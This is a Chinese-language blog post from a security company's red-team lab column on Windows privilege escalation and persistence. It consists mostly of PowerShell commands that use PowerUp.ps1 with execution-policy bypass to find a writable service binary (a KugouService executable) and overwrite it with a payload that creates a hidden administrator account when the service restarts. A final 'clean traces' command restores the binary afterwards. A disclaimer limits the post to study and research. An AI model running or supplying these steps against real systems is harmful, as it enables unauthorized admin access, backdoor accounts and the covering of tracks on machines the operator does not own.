咨詢服務熱線

400-6446-808

創安實驗室專欄
您的當前位置:首頁 > 創安實驗室專欄
windows利用常見程序進行權限維持
發布者:創信華通  發布時間:2023-02-24  浏覽量:248次











古語有雲:“學如逆水行舟,不進則退。”面對如今随時都在變化的網絡安全環境更是如此。爲此,創信華通微信公衆号特開(kāi)設“創安實驗室專欄”,以記錄創信華通創安實驗室在技術上的探索,加強同行間的交流,相互學習,共同進步。


+

+

windows利用常見程序進行權限維持

原理:利用PowerUp.ps1生(shēng)成一(yī)個可以執行我(wǒ)們構造的惡意命令的同名可執行程序并替換原本的可執行程序。主程序執行時調用同名可執行程序來執行我(wǒ)們構造的惡意命令。

查找具有可寫的可執行文件:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

查看程序對用戶的權限:icacls "D:\tools\KGMusic\9.1.44.23567\service.exe"

利用可執行文件提權,向可寫程序中(zhōng)寫入創建用戶的payload:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-ServiceEXE -ServiceName KugouService -Username jin -Password jin -Verbose}"

等待服務重啓或對應程序再次運行:

可以看到此時新建了一(yī)個管理員(yuán)權限的用戶jin

清理痕迹:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Restore-ServiceEXE -ServiceName KugouService}"


E·N·D


本文由創信華通創安實驗室編輯。

本文僅限于個人學習和技術研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權攻擊等違法行爲,均由使用者本人負責,本單位不爲此承擔任何責任。創安攻防實驗室擁有對此文章的修改和解釋權,如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部内容。


如有侵權,請聯系後台。




創安實驗室

創信華通創安實驗室,是天慕卓越(深圳)網絡科技有限公司旗下(xià)的技術研究團隊,成立于2021年9月,主要研究紅藍(lán)對抗、重大(dà)安全保障、應急響應等方向。

創安攻防實驗室圓滿完成了多次公安舉辦的重要網絡安全保障和攻防演習活動,并積極參加各類網絡安全競賽,屢獲殊榮。

創安攻防實驗室秉承創信華通的發展理念,緻力打造國内一(yī)流網絡安全團隊。



下(xià)一(yī)條:惡意程序分(fēn)析方法